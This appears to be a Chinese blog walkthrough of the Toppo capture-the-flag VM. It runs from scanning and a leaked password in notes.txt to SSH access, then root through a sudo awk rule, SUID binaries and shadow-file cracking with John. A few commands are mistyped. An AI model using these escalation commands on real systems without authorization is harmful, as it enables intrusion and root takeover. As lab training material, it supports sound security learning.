美文网首页
Toppo渗透实战

Toppo渗透实战

作者: 城市烈人 | 来源:发表于2019-01-13 15:55 被阅读0次

nmap全端口扫

用msf的search一下相关版本的漏洞

没找到相关漏洞,直接从web端入手


Web渗透

Dir爆目录

可疑目录打开:

http://192.168.8.123/admin/notes.txt

密码:12345ted123

扫了目录,没发现web有登陆界面

想必是ssh登陆


SSH登录

猜测用户名是:ted  (爬取web页面,发现ted)

密码:12345ted123


提权:

方法一:sudoers

ted@Toppo:/$ cat /etc/sudoers

ted ALL=(ALL) NOPASSWD: /usr/bin/awk

ted@Toppo:/$ awk 'BEGIN{system("whoami")}'

root

ted@Toppo:/$ awk 'BEGIN {system("ls/root")}'

flag.txt

ted@Toppo:/$ awk 'BEGIN {system("cat/root/flag.txt")}'

Congratulations ! there is your flag :0wnedlab{p4ssi0n_c0me_with_pract1ce}

方法二:suid提权

下面的命令可以发现所有的系统中运行的SUID可执行文件

find / -userroot -perm -4000 -print 2>/dev/null

运行python

拿到flag:

flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}


破解密码

用awk命令全局搜shadow文件

John破解shadow

密码:test123

可以直接登录主机


靶机下载地址:

链接:https://pan.baidu.com/s/1E_JzrrKVcTPobj4acIgKYA

提取码:u909

相关文章

  • Toppo渗透实战

    nmap全端口扫 用msf的search一下相关版本的漏洞 没找到相关漏洞,直接从web端入手 Web渗透 Dir...

  • 《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下

    《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下载 《Web渗透技术及实战案例解析.pdf》PDF...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • MERCY渗透实战

    信息收集 开放的端口服务有: smb枚举探测 139和445的共享服务端口,用enum4linux探测一下 发现q...

  • Sedna渗透实战

    靶机IP:192.168.8.153任务:获取4个flag分别在shell,root,还有靶机中 这个靶机开放了好...

  • RootThis渗透实战

    靶机ip:192.168.8.150 nmap扫端口 单单只开放了80 web服务端口 dir爆目录 小字典不够用...

  • eric渗透实战

    靶机IP :192.168.56.103 nmap扫 靶机比较简单,只开启了22和80端口 nmap探测到了192...

  • SolidState渗透实战

    靶机IP:192.168.218.147 nmap全端口扫 靶机开了一些不明端口 跑目录没发现什么 邮箱渗透 nm...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • WebDeveloper 渗透实战

    靶机IP:192.168.56.104 kali IP:192.168.56.101 nmap全扫 web渗透 既...

网友评论

      本文标题:Toppo渗透实战

      本文链接:https://www.haomeiwen.com/subject/wivtkqtx.html